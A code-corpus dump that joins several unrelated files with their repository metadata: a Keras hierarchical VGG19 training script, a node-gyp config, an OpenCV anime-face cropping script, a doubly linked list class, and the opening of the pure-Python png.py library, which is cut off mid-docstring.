class_names_c1 = ['Clothes', 'Goods']
class_names_c2 = ['Tops', 'Bottoms', 'Dresses', 'Outers', 'Accessories', 'Shoes']
c2_to_c1 = {0:0, 1:0, 2:0, 3:0, 4:1, 5:1}
fine_to_c2 = {0:0, 1:1, 2:0, 3:2, 4:3, 5:5, 6:0, 7:5, 8:4, 9:5}
def print_mappings(mapping, source, dest):
for k,v in mapping.items():
print(source[k], "->", dest[v])
print_mappings(c2_to_c1, class_names_c2, class_names_c1)
print("-"*10)
print_mappings(fine_to_c2, class_names, class_names_c2)
train_images.shape
train_labels_fine = to_categorical(train_labels)
train_labels_fine.shape
test_labels_fine = to_categorical(test_labels)
test_labels_fine.shape
train_labels_c2_index = [fine_to_c2[i] for i in train_labels]
train_labels_c2 = to_categorical(train_labels_c2_index)
train_labels_c2.shape
test_labels_c2_index = [fine_to_c2[i] for i in test_labels]
test_labels_c2 = to_categorical(test_labels_c2_index)
test_labels_c2.shape
train_labels_c1_index = [c2_to_c1[i] for i in train_labels_c2_index]
train_labels_c1 = to_categorical(train_labels_c1_index)
train_labels_c1.shape
test_labels_c1_index = [c2_to_c1[i] for i in test_labels_c2_index]
test_labels_c1 = to_categorical(test_labels_c1_index)
test_labels_c1.shape
x_train = train_images[..., np.newaxis]
x_test = test_images[..., np.newaxis]
y_train = train_labels_fine
y_test = test_labels_fine
y_c1_train = train_labels_c1
y_c1_test = test_labels_c1
y_c2_train = train_labels_c2
y_c2_test = test_labels_c2
print("x_train shape: ", x_train.shape)
print("x_test shape: ", x_test.shape)
print("y_train shape: ", y_train.shape)
print("y_test shape: ", y_test.shape)
print("y_c1_train shape: ", y_c1_train.shape)
print("y_c1_test shape: ", y_c1_test.shape)
print("y_c2_train shape: ", y_c2_train.shape)
print("y_c2_test shape: ", y_c2_test.shape)
alpha = K.variable(value=0.98, dtype="float32", name="alpha")
beta = K.variable(value=0.01, dtype="float32", name="beta")
gamma = K.variable(value=0.01, dtype="float32", name="gamma")
img_input = Input(shape=input_shape, name='input')
img_input
#block 1
x = Conv2D(64, (3, 3), activation='relu', padding='same')(img_input)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
#block 2
x = Conv2D(128, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
#coarse 1
c_1_bch = Flatten(name='c1_flatten')(x)
c_1_bch = Dense(256, activation='relu')(c_1_bch)
c_1_bch = BatchNormalization()(c_1_bch)
c_1_bch = Dropout(0.5)(c_1_bch)
c_1_bch = Dense(256, activation='relu')(c_1_bch)
c_1_bch = BatchNormalization()(c_1_bch)
c_1_bch = Dropout(0.5)(c_1_bch)
c_1_pred = Dense(coarse1_classes, activation='softmax')(c_1_bch)
#block 3
x = Conv2D(256, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(256, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
#coarse 2
c_2_bch = Flatten(name='c2_flatten')(x)
c_2_bch = Dense(1024, activation='relu')(c_2_bch)
c_2_bch = BatchNormalization()(c_2_bch)
c_2_bch = Dropout(0.5)(c_2_bch)
c_2_bch = Dense(1024, activation='relu')(c_2_bch)
c_2_bch = BatchNormalization()(c_2_bch)
c_2_bch = Dropout(0.5)(c_2_bch)
c_2_pred = Dense(coarse2_classes, activation='softmax')(c_2_bch)
#block 4
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = MaxPooling2D((2, 2), strides=(2, 2))(x)
#block 5
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
x = Conv2D(512, (3, 3), activation='relu', padding='same')(x)
x = BatchNormalization()(x)
#fine
x = Flatten(name='flatten')(x)
x = Dense(4096, activation='relu')(x)
x = BatchNormalization()(x)
x = Dropout(0.5)(x)
x = Dense(4096, activation='relu')(x)
x = BatchNormalization()(x)
x = Dropout(0.5)(x)
fine_pred = Dense(num_classes, activation='softmax')(x)
model = Model(img_input, [c_1_pred, c_2_pred, fine_pred], name='vgg19_hierarchy')
model.summary()
sgd = optimizers.SGD(lr=0.001, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=sgd,
loss_weights=[alpha, beta, gamma],
# optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
tb_cb = TensorBoard(log_dir=log_filepath, histogram_freq=0)
change_lr = LearningRateScheduler(scheduler)
change_lw = LossWeightsModifier(alpha, beta, gamma)
cbks = [change_lr, tb_cb, change_lw]
history = model.fit(x_train, [y_c1_train, y_c2_train, y_train],
batch_size=batch_size,
epochs=epochs,
verbose=1,
callbacks=cbks,
validation_data=(x_test, [y_c1_test, y_c2_test, y_test]))
'''model.compile(loss=keras.losses.categorical_crossentropy,
# optimizer=keras.optimizers.Adadelta(),
optimizer=sgd,
metrics=['accuracy'])'''
#model.save(model_path)
score = model.evaluate(x_test, [y_c1_test, y_c2_test, y_test], verbose=0)
print('score is: ', score)
# Commented out IPython magic to ensure Python compatibility.
# plot the loss and accuracy
import matplotlib.pyplot as plt
# %matplotlib inline
loss = history.history['loss']
dense_3_loss = history.history['dense_3_loss']
dense_6_loss = history.history['dense_6_loss']
dense_9_loss = history.history['dense_9_loss']
dense_3_accuracy = history.history['dense_3_accuracy']
dense_6_accuracy = history.history['dense_6_accuracy']
dense_9_accuracy = history.history['dense_9_accuracy']
val_loss = history.history['val_loss']
val_dense_3_loss = history.history['val_dense_3_loss']
val_dense_6_loss = history.history['val_dense_6_loss']
val_dense_9_loss = history.history['val_dense_9_loss']
val_dense_3_accuracy = history.history['val_dense_3_accuracy']
val_dense_6_accuracy = history.history['val_dense_6_accuracy']
val_dense_9_accuracy = history.history['val_dense_9_accuracy']
epochs = range(1, 60)
plt.title('Training and validation accuracy')
plt.plot(epochs, dense_3_accuracy, 'red', label='Training C1 accuracy')
plt.plot(epochs, dense_6_accuracy, 'blue', label='Training C2 accuracy')
plt.plot(epochs, dense_9_accuracy, 'green', label='Training F accuracy')
plt.plot(epochs, val_dense_3_accuracy, 'yellow', label='Validation C1 accuracy')
plt.plot(epochs, val_dense_6_accuracy, 'violet', label='Validation C2 accuracy')
plt.plot(epochs, val_dense_9_accuracy, 'gray', label='Validation F accuracy')
plt.legend()
plt.figure()
plt.title('Training and validation loss')
plt.plot(epochs, dense_3_loss, 'red', label='Training C1 loss')
plt.plot(epochs, dense_6_loss, 'blue', label='Training C2 loss')
plt.plot(epochs, dense_9_loss, 'green', label='Training F loss')
plt.plot(epochs, val_dense_3_loss, 'yellow', label='Validation C1 loss')
plt.plot(epochs, val_dense_6_loss, 'violet', label='Validation C2 loss')
plt.plot(epochs, val_dense_9_loss, 'gray', label='Validation F loss')
plt.legend()
plt.show()
|
[
"562361206@qq.com"
] |
562361206@qq.com
|
0d6cfe2c77e0e1bb3ca4bf5fd8f34f7a54259a6c
|
923f62f60cc56ab0b0613a8533a9d03de31212b8
|
/node_modules/socket.io/node_modules/engine.io/node_modules/uws/build/config.gypi
|
1e0abbc56d4f5ed0133415aef049a9eba78c91fd
|
[
"Zlib",
"MIT"
] |
permissive
|
rcmeng1q84/LeapWatch
|
0470ee8222dff4dd455f42c9457280fbf8cf0e22
|
e7353bdb3ba0a4f160f922ab041aab8f0bbd5551
|
refs/heads/master
| 2021-04-15T12:52:01.681642
| 2018-04-06T02:43:14
| 2018-04-06T02:43:14
| 126,636,987
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,791
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"host_arch": "x64",
"icu_data_file": "icudt56l.dat",
"icu_data_in": "../../deps/icu/source/data/in/icudt56l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "./deps/icu",
"icu_small": "true",
"icu_ver_major": "56",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/RC/.node-gyp/4.5.0",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/zsh",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"access": "",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/RC/.npm-init.js",
"userconfig": "/Users/RC/.npmrc",
"node_version": "4.5.0",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/RC/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/2.15.9 node/v4.5.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "0022",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/_4/wydw9sw51cq1116mg59p1_m80000gn/T",
"unsafe_perm": "true",
"link": "",
"prefix": "/usr/local"
}
}
|
[
"13718988038@sina.cn"
] |
13718988038@sina.cn
|
a23f6fc0c570f48b3fb4aecbbf16d3c49e839959
|
7ae4c0286f214f018e8c60d25af88de8fcfd7a86
|
/test.py
|
c918e842d349ac07d9b48a4b498a477e7015ebbc
|
[] |
no_license
|
savslug/anime_face
|
02ee309c21a27a48074f77eb6b7e6a0b0b3ec1b3
|
de0ed7419eb12838e5b8ad44871365b1ec307538
|
refs/heads/master
| 2020-06-03T03:41:47.450754
| 2018-04-19T15:41:34
| 2018-04-19T15:41:34
| 191,418,621
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,490
|
py
|
def extract_faces(images_dir, export_dir='faces'):
"""
与えられたパスの画像からアニメの顔を抽出
facesディレクトリに顔部分を出力
"""
import os
import cv2
import glob
from tqdm import tqdm
# 特徴量ファイルをもとに分類器を作成
classifier = cv2.CascadeClassifier('lbpcascade_animeface.xml')
# ディレクトリを作成
output_dir = export_dir
if not os.path.exists(output_dir):
os.makedirs(output_dir)
for image_path in tqdm(glob.glob(images_dir + '/*')):
# print(image_path)
# 顔の検出
image = cv2.imread(image_path)
# グレースケールで処理を高速化
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = classifier.detectMultiScale(gray_image)
# print(faces)
for i, (x, y, w, h) in enumerate(faces):
# 一人ずつ顔を切り抜く
face_image = image[y:y + h, x:x + w]
output_path = os.path.join(
output_dir, image_path[len(images_dir) + 1:] + '{0}.jpg'.format(i))
print(output_path)
cv2.imwrite(output_path, face_image)
#cv2.imwrite('face.jpg', image)
return
for x, y, w, h in faces:
# 四角を描く
cv2.rectangle(image, (x, y), (x + w, y + h),
color=(0, 0, 255), thickness=3)
cv2.imwrite('faces.jpg', image)
extract_faces('mov2image_dir')
|
[
"yu.donarudo@gmail.com"
] |
yu.donarudo@gmail.com
|
f4ad486dd74607cca129db7b1c244bc715efb4ed
|
f30364f06528315d7f2f1aab8b6e607e1e946242
|
/mangagrabber/src/mailers/__init__.py
|
e410017168c30e0d7c17279eab70f3c6e09d12c2
|
[] |
no_license
|
donald-cl/mangagrabber
|
adb08ea01bb34383731435a760e4ce4b81da4164
|
771b0958773ba5a962e2738f171dd2602b9822b1
|
refs/heads/master
| 2020-04-27T11:09:01.757397
| 2014-05-08T01:58:40
| 2014-05-08T01:58:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 27
|
py
|
from mailers.mail import *
|
[
"donaldhui@gmail.com"
] |
donaldhui@gmail.com
|
62783cd5b5ff72132dd48adef30afb91b761a8ff
|
7ca2fd28b2f9a6b65fed33c0a5365222d646ae9d
|
/data-structures/TwoWayLinkedList.py
|
2c12412045b144b28787ba6bb9fd1f093a6e8903
|
[] |
no_license
|
KyattPL/algorithms-and-data-structures
|
b1db73df8abb9ac609b70553ce482765eb7c4775
|
a58620df9b7af6e650cce3c21a61b85e5803f2a8
|
refs/heads/master
| 2022-11-17T08:40:12.330749
| 2020-07-11T15:25:41
| 2020-07-11T15:25:41
| 276,085,215
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,944
|
py
|
# With Head and Tail
class TwoWayLinkedList:
class Element:
def __init__(self, val):
self.value = val
self.next = None
self.previous = None
def __init__(self):
self.head = None
self.tail = None
def push(self, val):
if self.head is None:
newElem = self.Element(val)
self.head = newElem
self.tail = newElem
else:
newElem = self.Element(val)
self.tail.next = newElem
newElem.previous = self.tail
self.tail = newElem
def print_list(self):
elem = self.head
if elem is None:
return
else:
while elem != self.tail:
print(elem.value)
elem = elem.next
print(self.tail.value)
def print_reverse(self):
elem = self.tail
if elem is None:
return
else:
while elem != self.head:
print(elem.value)
elem = elem.previous
print(self.head.value)
def pop(self):
elem = self.tail
if elem is None:
return None
else:
newTail = elem.previous
val = elem.value
self.tail = newTail
return val
def contains(self, val):
elem = self.head
if elem is None:
return False
else:
while elem:
if elem.value == val:
return True
else:
elem = elem.next
return False
def length(self):
count = 0
elem = self.head
if elem is None:
return 0
else:
while elem:
count += 1
elem = elem.next
return count
def add(self, val, index):
if index < 0 or index >= self.length():
return None
else:
if index == 0:
elem = self.head
newElem = self.Element(val)
newElem.next = elem
elem.previous = newElem
self.head = newElem
return
else:
elem = self.head
ind = 1
while ind != index:
ind += 1
elem = elem.next
newElem = self.Element(val)
if elem.next:
newElem.next = elem.next
newElem.previous = elem
elem.next.previous = newElem
elem.next = newElem
else:
newElem.next = None
newElem.previous = elem
elem.next = newElem
def remove(self, index):
if index < 0 or index >= self.length():
return None
else:
if index == 0:
elem = self.head
val = elem.value
self.head = elem.next
if self.head is None:
self.tail = None
return val
else:
elem = self.head
ind = 0
while ind != index:
ind += 1
elem = elem.next
if self.tail != elem:
val = elem.value
elem.previous.next = elem.next
elem.next.previous = elem.previous
return val
else:
val = elem.value
elem.previous.next = None
self.tail = elem.previous
return val
if __name__ == "__main__":
x = TwoWayLinkedList()
x.push(3)
x.push(69)
x.push(2137)
print(x.contains(69))
print(x.length())
x.print_list()
x.add(32, 1)
x.print_list()
x.remove(3)
x.print_list()
|
[
"siema1234@gazeta.pl"
] |
siema1234@gazeta.pl
|
03b99fbb2aa8f4041b11fbef045e0f3f7cf1b735
|
6728903c1e95fa7de502a7ba6f3318835cb38513
|
/tools/pokemontools/png.py
|
3d6934a9f7890b495ece68482cdcceed474a4509
|
[] |
no_license
|
Neos21/pokegold
|
4cfde2e63cb5bd7487cd320ea325cb14eda2cd34
|
89a078c9e868654efe04695a5221a48f99529982
|
refs/heads/master
| 2023-01-11T08:55:53.445139
| 2020-11-19T01:41:27
| 2020-11-19T01:41:27
| 266,638,433
| 0
| 0
| null | 2020-05-24T22:55:14
| 2020-05-24T22:55:13
| null |
UTF-8
|
Python
| false
| false
| 100,636
|
py
|
#!/usr/bin/env python
from __future__ import print_function
# png.py - PNG encoder/decoder in pure Python
#
# Copyright (C) 2006 Johann C. Rocholl <johann@browsershots.org>
# Portions Copyright (C) 2009 David Jones <drj@pobox.com>
# And probably portions Copyright (C) 2006 Nicko van Someren <nicko@nicko.org>
#
# Original concept by Johann C. Rocholl.
#
# LICENCE (MIT)
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Pure Python PNG Reader/Writer
This Python module implements support for PNG images (see PNG
specification at http://www.w3.org/TR/2003/REC-PNG-20031110/ ). It reads
and writes PNG files with all allowable bit depths
(1/2/4/8/16/24/32/48/64 bits per pixel) and colour combinations:
greyscale (1/2/4/8/16 bit); RGB, RGBA, LA (greyscale with alpha) with
8/16 bits per channel; colour mapped images (1/2/4/8 bit).
Adam7 interlacing is supported for reading and
writing. A number of optional chunks can be specified (when writing)
and understood (when reading): ``tRNS``, ``bKGD``, ``gAMA``.
For help, type ``import png; help(png)`` in your python interpreter.
A good place to start is the :class:`Reader` and :class:`Writer`
classes.
Requires Python 2.3. Limited support is available for Python 2.2, but
not everything works. Best with Python 2.4 and higher. Installation is
trivial, but see the ``README.txt`` file (with the source distribution)
for details.
This file can also be used as a command-line utility to convert
`Netpbm <http://netpbm.sourceforge.net/>`_ PNM files to PNG, and the
reverse conversion from PNG to PNM. The interface is similar to that
of the ``pnmtopng`` program from Netpbm. Type ``python png.py --help``
at the shell prompt for usage and a list of options.
A note on spelling and terminology
----------------------------------
Generally British English spelling is used in the documentation. So
that's "greyscale" and "colour". This not only matches the author's
native language, it's also used by the PNG specification.
The major colour models supported by PNG (and hence by PyPNG) are:
greyscale, RGB, greyscale--alpha, RGB--alpha. These are sometimes
referred to using the abbreviations: L, RGB, LA, RGBA. In this case
each letter abbreviates a single channel: *L* is for Luminance or Luma
or Lightness which is the channel used in greyscale images; *R*, *G*,
*B* stand for Red, Green, Blue, the components of a colour image; *A*
stands for Alpha, the opacity channel (used for transparency effects,
but higher values are more opaque, so it makes sense to call it
opacity).
A note on formats
-----------------
When getting pixel data out of this module (reading) and presenting
data to this module (writing) there are a number of ways the data could
be represented as a Python value. Generally this module uses one of
three formats called "flat row flat pixel", "boxed row flat pixel", and
"boxed row boxed pixel". Basically the concern is whether each pixel
and each row comes in its own little tuple (box), or not.
Consider an image that is 3 pixels wide by 2 pixels high, and each pixel
has RGB components:
Boxed row flat pixel::
list([R,G,B, R,G,B, R,G,B],
[R,G,B, R,G,B, R,G,B])
Each row appears as its own list, but the pixels are flattened so
that three values for one pixel simply follow the three values for
the previous pixel. This is the most common format used, because it
provides a good compromise between space and convenience. PyPNG regards
itself as at liberty to replace any sequence type with any sufficiently
compatible other sequence type; in practice each row is an array (from
the array module), and the outer list is sometimes an iterator rather
than an explicit list (so that streaming is possible).
Flat row flat pixel::
[R,G,B, R,G,B, R,G,B,
R,G,B, R,G,B, R,G,B]
The entire image is one single giant sequence of colour values.
Generally an array will be used (to save space), not a list.
Boxed row boxed pixel::
list([ (R,G,B), (R,G,B), (R,G,B) ],
[ (R,G,B), (R,G,B), (R,G,B) ])
Each row appears in its own list, but each pixel also appears in its own
tuple. A serious memory burn in Python.
In all cases the top row comes first, and for each row the pixels are
ordered from left-to-right. Within a pixel the values appear in the
order, R-G-B-A (or L-A for greyscale--alpha).
There is a fourth format, mentioned because it is used internally,
is close to what lies inside a PNG file itself, and has some support
from the public API. This format is called packed. When packed,
each row is a sequence of bytes (integers from 0 to 255), just as
it is before PNG scanline filtering is applied. When the bit depth
is 8 this is essentially the same as boxed row flat pixel; when the
bit depth is less than 8, several pixels are packed into each byte;
when the bit depth is 16 (the only value more than 8 that is supported
by the PNG image format) each pixel value is decomposed into 2 bytes
(and `packed` is a misnomer). This format is used by the
:meth:`Writer.write_packed` method. It isn't usually a convenient
format, but may be just right if the source data for the PNG image
comes from something that uses a similar format (for example, 1-bit
BMPs, or another PNG file).
And now, my famous members
--------------------------
"""
__version__ = "0.0.18"
import itertools
import math
# http://www.python.org/doc/2.4.4/lib/module-operator.html
import operator
import struct
import sys
# http://www.python.org/doc/2.4.4/lib/module-warnings.html
import warnings
import zlib
from array import array
from functools import reduce
try:
# `cpngfilters` is a Cython module: it must be compiled by
# Cython for this import to work.
# If this import does work, then it overrides pure-python
# filtering functions defined later in this file (see `class
# pngfilters`).
import cpngfilters as pngfilters
except ImportError:
pass
__all__ = ['Image', 'Reader', 'Writer', 'write_chunks', 'from_array']
# The PNG signature.
# http://www.w3.org/TR/PNG/#5PNG-file-signature
_signature = struct.pack('8B', 137, 80, 78, 71, 13, 10, 26, 10)
_adam7 = ((0, 0, 8, 8),
(4, 0, 8, 8),
(0, 4, 4, 8),
(2, 0, 4, 4),
(0, 2, 2, 4),
(1, 0, 2, 2),
(0, 1, 1, 2))
def group(s, n):
# See http://www.python.org/doc/2.6/library/functions.html#zip
return list(zip(*[iter(s)]*n))
def isarray(x):
return isinstance(x, array)
def tostring(row):
return row.tostring()
def interleave_planes(ipixels, apixels, ipsize, apsize):
"""
Interleave (colour) planes, e.g. RGB + A = RGBA.
Return an array of pixels consisting of the `ipsize` elements of
data from each pixel in `ipixels` followed by the `apsize` elements
of data from each pixel in `apixels`. Conventionally `ipixels`
and `apixels` are byte arrays so the sizes are bytes, but it
actually works with any arrays of the same type. The returned
array is the same type as the input arrays which should be the
same type as each other.
"""
itotal = len(ipixels)
atotal = len(apixels)
newtotal = itotal + atotal
newpsize = ipsize + apsize
# Set up the output buffer
# See http://www.python.org/doc/2.4.4/lib/module-array.html#l2h-1356
out = array(ipixels.typecode)
# It's annoying that there is no cheap way to set the array size :-(
out.extend(ipixels)
out.extend(apixels)
# Interleave in the pixel data
for i in range(ipsize):
out[i:newtotal:newpsize] = ipixels[i:itotal:ipsize]
for i in range(apsize):
out[i+ipsize:newtotal:newpsize] = apixels[i:atotal:apsize]
return out
def check_palette(palette):
"""Check a palette argument (to the :class:`Writer` class)
for validity. Returns the palette as a list if okay; raises an
exception otherwise.
"""
# None is the default and is allowed.
if palette is None:
return None
p = list(palette)
if not (0 < len(p) <= 256):
raise ValueError("a palette must have between 1 and 256 entries")
seen_triple = False
for i,t in enumerate(p):
if len(t) not in (3,4):
raise ValueError(
"palette entry %d: entries must be 3- or 4-tuples." % i)
if len(t) == 3:
seen_triple = True
if seen_triple and len(t) == 4:
raise ValueError(
"palette entry %d: all 4-tuples must precede all 3-tuples" % i)
for x in t:
if int(x) != x or not(0 <= x <= 255):
raise ValueError(
"palette entry %d: values must be integer: 0 <= x <= 255" % i)
return p
def check_sizes(size, width, height):
"""Check that these arguments, in supplied, are consistent.
Return a (width, height) pair.
"""
if not size:
return width, height
if len(size) != 2:
raise ValueError(
"size argument should be a pair (width, height)")
if width is not None and width != size[0]:
raise ValueError(
"size[0] (%r) and width (%r) should match when both are used."
% (size[0], width))
if height is not None and height != size[1]:
raise ValueError(
"size[1] (%r) and height (%r) should match when both are used."
% (size[1], height))
return size
def check_color(c, greyscale, which):
"""Checks that a colour argument for transparent or
background options is the right form. Returns the colour
(which, if it's a bar integer, is "corrected" to a 1-tuple).
"""
if c is None:
return c
if greyscale:
try:
len(c)
except TypeError:
c = (c,)
if len(c) != 1:
raise ValueError("%s for greyscale must be 1-tuple" %
which)
if not isinteger(c[0]):
raise ValueError(
"%s colour for greyscale must be integer" % which)
else:
if not (len(c) == 3 and
isinteger(c[0]) and
isinteger(c[1]) and
isinteger(c[2])):
raise ValueError(
"%s colour must be a triple of integers" % which)
return c
class Error(Exception):
def __str__(self):
return self.__class__.__name__ + ': ' + ' '.join(self.args)
class FormatError(Error):
"""Problem with input file format. In other words, PNG file does
not conform to the specification in some way and is invalid.
"""
class ChunkError(FormatError):
pass
class Writer:
"""
PNG encoder in pure Python.
"""
def __init__(self, width=None, height=None,
size=None,
greyscale=False,
alpha=False,
bitdepth=8,
palette=None,
transparent=None,
background=None,
gamma=None,
compression=None,
interlace=False,
bytes_per_sample=None, # deprecated
planes=None,
colormap=None,
maxval=None,
chunk_limit=2**20,
x_pixels_per_unit = None,
y_pixels_per_unit = None,
unit_is_meter = False):
"""
Create a PNG encoder object.
Arguments:
width, height
Image size in pixels, as two separate arguments.
size
Image size (w,h) in pixels, as single argument.
greyscale
Input data is greyscale, not RGB.
alpha
Input data has alpha channel (RGBA or LA).
bitdepth
Bit depth: from 1 to 16.
palette
Create a palette for a colour mapped image (colour type 3).
transparent
Specify a transparent colour (create a ``tRNS`` chunk).
background
Specify a default background colour (create a ``bKGD`` chunk).
gamma
Specify a gamma value (create a ``gAMA`` chunk).
compression
zlib compression level: 0 (none) to 9 (more compressed);
default: -1 or None.
interlace
Create an interlaced image.
chunk_limit
Write multiple ``IDAT`` chunks to save memory.
x_pixels_per_unit
Number of pixels a unit along the x axis (write a
`pHYs` chunk).
y_pixels_per_unit
Number of pixels a unit along the y axis (write a
`pHYs` chunk). Along with `x_pixel_unit`, this gives
the pixel size ratio.
unit_is_meter
`True` to indicate that the unit (for the `pHYs`
chunk) is metre.
The image size (in pixels) can be specified either by using the
`width` and `height` arguments, or with the single `size`
argument. If `size` is used it should be a pair (*width*,
*height*).
`greyscale` and `alpha` are booleans that specify whether
an image is greyscale (or colour), and whether it has an
alpha channel (or not).
`bitdepth` specifies the bit depth of the source pixel values.
Each source pixel value must be an integer between 0 and
``2**bitdepth-1``. For example, 8-bit images have values
between 0 and 255. PNG only stores images with bit depths of
1,2,4,8, or 16. When `bitdepth` is not one of these values,
the next highest valid bit depth is selected, and an ``sBIT``
(significant bits) chunk is generated that specifies the
original precision of the source image. In this case the
supplied pixel values will be rescaled to fit the range of
the selected bit depth.
The details of which bit depth / colour model combinations the
PNG file format supports directly, are somewhat arcane
(refer to the PNG specification for full details). Briefly:
"small" bit depths (1,2,4) are only allowed with greyscale and
colour mapped images; colour mapped images cannot have bit depth
16.
For colour mapped images (in other words, when the `palette`
argument is specified) the `bitdepth` argument must match one of
the valid PNG bit depths: 1, 2, 4, or 8. (It is valid to have a
PNG image with a palette and an ``sBIT`` chunk, but the meaning
is slightly different; it would be awkward to press the
`bitdepth` argument into service for this.)
The `palette` option, when specified, causes a colour
mapped image to be created: the PNG colour type is set to 3;
`greyscale` must not be set; `alpha` must not be set;
`transparent` must not be set; the bit depth must be 1,2,4,
or 8. When a colour mapped image is created, the pixel values
are palette indexes and the `bitdepth` argument specifies the
size of these indexes (not the size of the colour values in
the palette).
The palette argument value should be a sequence of 3- or
4-tuples. 3-tuples specify RGB palette entries; 4-tuples
specify RGBA palette entries. If both 4-tuples and 3-tuples
appear in the sequence then all the 4-tuples must come
before all the 3-tuples. A ``PLTE`` chunk is created; if there
are 4-tuples then a ``tRNS`` chunk is created as well. The
``PLTE`` chunk will contain all the RGB triples in the same
sequence; the ``tRNS`` chunk will contain the alpha channel for
all the 4-tuples, in the same sequence. Palette entries
are always 8-bit.
If specified, the `transparent` and `background` parameters must
be a tuple with three integer values for red, green, blue, or
a simple integer (or singleton tuple) for a greyscale image.
If specified, the `gamma` parameter must be a positive number
(generally, a `float`). A ``gAMA`` chunk will be created.
Note that this will not change the values of the pixels as
they appear in the PNG file, they are assumed to have already
been converted appropriately for the gamma specified.
The `compression` argument specifies the compression level to
